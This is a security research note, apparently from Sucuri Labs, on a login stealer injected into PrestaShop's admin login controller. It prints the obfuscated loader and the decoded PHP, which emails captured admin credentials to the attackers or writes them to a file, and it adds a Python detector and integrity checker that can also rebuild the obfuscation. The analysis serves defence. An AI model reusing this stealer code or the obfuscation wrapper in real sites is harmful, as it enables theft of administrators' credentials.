Labs Note

PrestaShop Login Stealer

October 27, 2016, by Moe O


Lately, we've noticed an increase in credential-stealing attempts and techniques targeting e-commerce websites. These sites usually hold sensitive information (credit card data and back-end credentials) that would allow attackers to profit from both the information and the infected website itself.

This post covers a different technique being used against PrestaShop installations. It varies from the one we described in a previous Labs Note.

In this case, the attackers again used the './controllers/admin/AdminLoginController.php' file, but they injected a different piece of malicious code:

eval(gzinflate(base64_decode("VZBvS8MwEMbfD/YdjlJICz<CONTENT EDITED>UfYHOdgoOBMMc2fGNdObtLF82f9d5p/AQ==")));

Here is the decoded version of the malicious code:

<?php
if (function_exists("mail")) {
    // Recipient addresses (redacted); each one gets a copy of the captured credentials
    $listo = array(
        'eNyong' => 'a<removed>@<removed>mail.com',
        'Dowoh'  => 'm<removed>l@<removed>mail.com'
    );
    foreach ($listo as $ming => $imel) {
        // $employee, $email and $passwd are the login controller's own variables at this point
        mail($imel, 'Setoran Admin ' . $_SERVER['HTTP_HOST'] . ' ^^',
             "Kye Pak $ming,\n\nNama: " . $employee->firstname . " " . $employee->lastname .
             "\nEmail: $email\nPassword: $passwd");
    }
} else {
    // Fallback when mail() is unavailable: append the credentials to a file on the site
    $f = fopen('uspas.txt', 'a');
    fwrite($f, "imel:$email | pass: $passwd\n");
    fclose($f);
}
?>

The attackers used an interesting conditional statement that would get them the information they were after regardless of server limitations. In other words, the code checks whether the server can send mail; if it can, all the captured data is emailed to the attackers' addresses, and if it can't, the code simply appends the username and password to a file named 'uspas.txt' on the server.

From there, the attackers could simply choose between checking the e-mail inbox or retrieving the .txt file from the victim's website.

In case of a compromise, all user accounts and their personal information should be assumed stolen. It's therefore recommended to change all passwords for the back-end, cPanel, SFTP and any other access mechanism that could give attackers leverage.

A business's reputation can be damaged if sensitive information or customers' credit card data falls into the wrong hands or is used without authorization. Keeping good security practices, such as File Integrity Monitoring, a Web Application Firewall and other measures, will help reduce the risk of infection.
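The two defensive points above (spotting the eval/gzinflate/base64 loader injected into the controller, and noticing that a core file changed at all) can be checked with a small script. The following is an added example, not code from Sucuri or from PrestaShop: it decodes the loader shape shown earlier the way PHP's gzinflate() would (raw DEFLATE), flags the credential-handling calls that appeared in the decoded payload, and runs a minimal hash-baseline comparison of the kind a File Integrity Monitoring tool performs. The "infected" controller it scans is constructed inside the script with a harmless stand-in payload, since the real blob on this page is redacted.

```python
import base64
import hashlib
import re
import zlib

# Loader shape seen in this Labs Note: eval(gzinflate(base64_decode("..."))).
# Whitespace is tolerated because injected code is often minified or padded.
LOADER_RE = re.compile(
    r'eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*\)',
    re.IGNORECASE,
)

# Calls and variables that, inside a login controller, point at credential capture
# or exfiltration. All of them occur in the decoded payload discussed above.
SUSPICIOUS_MARKERS = ("mail(", "fopen(", "fwrite(", "$passwd", "$_SERVER['HTTP_HOST']")


def gzinflate(data: bytes) -> bytes:
    """PHP's gzinflate() inflates raw DEFLATE data (no zlib/gzip header): wbits=-15."""
    return zlib.decompress(data, -15)


def decode_loader(blob: str, max_layers: int = 5) -> str:
    """Undo nested base64+gzinflate layers until plain PHP remains."""
    text = blob
    for _ in range(max_layers):
        m = LOADER_RE.search(text)
        if not m:
            break
        text = gzinflate(base64.b64decode(m.group(1))).decode("utf-8", errors="replace")
    return text


def scan_php_source(source: str) -> dict:
    """Return the decoded payload and the markers found in it (empty if nothing obfuscated)."""
    m = LOADER_RE.search(source)
    if not m:
        return {"obfuscated": False, "payload": "", "markers": []}
    payload = decode_loader(m.group(0))
    markers = [k for k in SUSPICIOUS_MARKERS if k in payload]
    return {"obfuscated": True, "payload": payload, "markers": markers}


def sha256_text(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def changed_files(baseline: dict, current: dict) -> list:
    """Minimal file-integrity check: paths whose SHA-256 differs from the baseline, or are new."""
    return sorted(path for path, digest in current.items() if baseline.get(path) != digest)


# --- constructed sample (hypothetical; the page's real blob is redacted) ---
CLEAN_CONTROLLER = "<?php\nclass AdminLoginController extends AdminController { }\n"
FAKE_PAYLOAD = (
    "<?php if(function_exists('mail')){ mail('x@example.invalid','s',$passwd); }"
    "else{ $f=fopen('uspas.txt','a'); fwrite($f,$passwd); }"
)


def build_obfuscated(php: str) -> str:
    """Wrap PHP in the same loader shape, using raw DEFLATE so gzinflate() can unpack it."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = c.compress(php.encode()) + c.flush()
    return 'eval(gzinflate(base64_decode("%s")));' % base64.b64encode(raw).decode()


INFECTED_CONTROLLER = CLEAN_CONTROLLER + build_obfuscated(FAKE_PAYLOAD) + "\n"

if __name__ == "__main__":
    path = "controllers/admin/AdminLoginController.php"
    baseline = {path: sha256_text(CLEAN_CONTROLLER)}
    current = {path: sha256_text(INFECTED_CONTROLLER), "uspas.txt": sha256_text("")}
    print("modified or new:", changed_files(baseline, current))
    result = scan_php_source(INFECTED_CONTROLLER)
    print("markers:", result["markers"])
    print(result["payload"])
```

In practice the baseline dictionary would be built from a known-clean copy of the PrestaShop release and the current one from the live document root; a new file such as 'uspas.txt' appearing next to the controller is as strong a signal as the modified controller itself, so the check reports additions as well as changes.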


Categories: Sucuri Labs. Tags: Labs Note

About Moe O

Moe O is Sucuri’s Website Security Analyst. Moe's main responsibilities include remediation. His professional experience covers 10 years of remediation. When Moe isn’t fighting or researching malware, you might find him traveling. Connect with him on our Twitter.
